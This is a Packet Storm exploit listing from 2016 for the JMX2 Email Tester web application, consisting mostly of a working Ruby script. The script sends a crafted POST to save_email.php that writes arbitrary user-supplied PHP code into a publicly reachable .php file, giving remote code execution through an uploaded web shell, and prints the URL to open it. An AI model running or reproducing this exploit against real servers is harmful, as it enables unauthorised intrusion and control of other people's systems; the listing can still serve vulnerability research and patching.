JMX2 Email Tester Remote Shell Upload

2016-02-15T00:00:00
ID PACKETSTORM:135759
Type packetstorm
Reporter HaHwul
Modified 2016-02-15T00:00:00

Description

                                        
                                            `# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)  
# Date: 2016-02-15  
# Blog: http://www.hahwul.com  
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester  
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip  
# Tested on: debian [wheezy]  
# CVE : none  
  
require "net/http"  
require "uri"  
require 'uri-handler'  
  
if ARGV.length != 2  
  
puts "JMX2 Email Tester Web Shell Uploader"  
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"  
puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"  
puts " phpCode(ex): echo 'zzzzz'"  
puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"  
puts " Install GEM: #> gem install uri-handler"  
puts " exploit & code by hahwul[www.hahwul.com]"   
else  
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/  
shell = ARGV[1] # PHP Code  
shell = shell.to_uri  
exp_url = target_url + "/models/save_email.php"  
puts shell  
uri = URI.parse(exp_url)  
http = Net::HTTP.new(uri.host, uri.port)  
puts exp_url  
request = Net::HTTP::Post.new(uri.request_uri)  
request["Accept-Encoding"] = "gzip, deflate"  
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"  
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"  
request["Accept"] = "application/json, text/javascript, */*; q=0.01"  
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"  
request["Connection"] = "keep-alive"  
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})  
response = http.request(request)  
  
puts "[Result] Status code: "+response.code  
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"  
end  
  
  
`